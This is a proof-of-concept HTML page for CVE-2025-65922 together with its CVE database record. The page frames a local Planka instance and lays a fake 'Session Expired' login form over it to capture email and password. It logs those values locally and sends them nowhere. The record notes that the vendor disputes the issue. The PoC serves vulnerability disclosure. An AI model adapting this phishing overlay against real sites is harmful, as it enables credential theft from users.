CVE-2025-65922

<!-- CVE-2025-65922 PoC: Clickjacking/Phishing via iframe embedding --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Malicious Site - CVE-2025-65922 PoC</title> <style> body { margin: 0; padding: 20px; font-family: Arial, sans-serif; background: #f0f0f0; } .container { position: relative; width: 100%; max-width: 1200px; margin: 0 auto; } h1 { color: #333; text-align: center; } .iframe-wrapper { position: relative; width: 100%; height: 700px; border: 2px solid #333; border-radius: 8px; overflow: hidden; } iframe { width: 100%; height: 100%; border: none; } /* Fake overlay form positioned over the legitimate login */ .fake-overlay { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); background: rgba(255, 255, 255, 0.95); padding: 30px; border-radius: 10px; box-shadow: 0 10px 40px rgba(0,0,0,0.3); text-align: center; z-index: 10; width: 300px; } .fake-overlay input { width: 100%; padding: 12px; margin: 10px 0; border: 1px solid #ccc; border-radius: 5px; box-sizing: border-box; } .fake-overlay button { width: 100%; padding: 12px; background: #4CAF50; color: white; border: none; border-radius: 5px; cursor: pointer; font-size: 16px; } .fake-overlay button:hover { background: #45a049; } .warning { background: #ff9800; color: white; padding: 15px; border-radius: 5px; margin-bottom: 20px; text-align: center; } </style> </head> <body> <div class="container"> <div class="warning"> <strong>⚠️ Educational PoC for CVE-2025-65922</strong><br> This demonstrates how Planka can be embedded due to missing security headers. </div> <h1>Phishing Page with Embedded Planka (CVE-2025-65922)</h1> <div class="iframe-wrapper"> <!-- Embedding legitimate Planka application --> <iframe src="http://localhost:3000" sandbox="allow-scripts allow-forms allow-same-origin"></iframe> <!-- Fake overlay form for credential capture --> <div class="fake-overlay"> <h3>🔒 Session Expired</h3> <p style="color: #666; font-size: 14px;">Please verify your credentials to continue</p> <form id="phishingForm"> <input type="email" placeholder="Email" required> <input type="password" placeholder="Password" required> <button type="submit">Verify Identity</button> </form> </div> </div> <p style="text-align: center; margin-top: 20px; color: #666;"> <strong>Note:</strong> The overlay captures credentials even though the legitimate Planka page is displayed. This works because Planka lacks X-Frame-Options and CSP frame-ancestors headers. </p> </div> <script> // Capture credentials document.getElementById('phishingForm').addEventListener('submit', function(e) { e.preventDefault(); const formData = new FormData(this); const credentials = { email: this.querySelector('input[type="email"]').value, password: this.querySelector('input[type="password"]').value, timestamp: new Date().toISOString() }; console.log('Captured credentials:', credentials); alert('Credentials captured! (This is a PoC)'); }); </script> </body> </html>

{"cve": {"id": "CVE-2025-65922", "sourceIdentifier": "[email protected]", "published": "2026-01-05T18:15:44.397", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "PLANKA 2.0.0 lacks X-Frame-Options and CSP frame-ancestors headers, allowing the application to be embedded within malicious iframes. While this does not lead to unintended modification of projects or tasks, it exposes users to Phishing attacks. Attackers can frame the legitimate Planka application on a malicious site to establish false trust (UI Redressing), potentially tricking users into entering sensitive information or credentials into overlaid fake forms. NOTE: this is disputed by the Supplier because \"PLANKA uses SameSite=Strict cookies, preventing authentication in cross-origin contexts. No session can be established. No credential interception or unauthorized actions are possible. Browser Same-Origin Policy prevents the parent page from accessing iframe content. Clickjacking is not applicable on the login page. Any credential capture would require attacker-controlled input and user interaction equivalent to phishing. The security outcome depends entirely on the user's trust in the parent page. An attacker can achieve the same effect with a fully fake login page. Embedding the legitimate page adds no risk, as browsers do not show URL, certificate, or padlock indicators in cross-origin iframes.\""}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1021"}]}], "references": [{"url": "https://github.com/09OHs/CVE/blob/e67290bef68d35980d10fd87c9c4403d8e40fc2c/CVE-2025-65922/CVE-2025-65922.pdf", "source": "[email protected]"}, {"url": "https://github.com/plankanban/planka", "source": "[email protected]"}]}}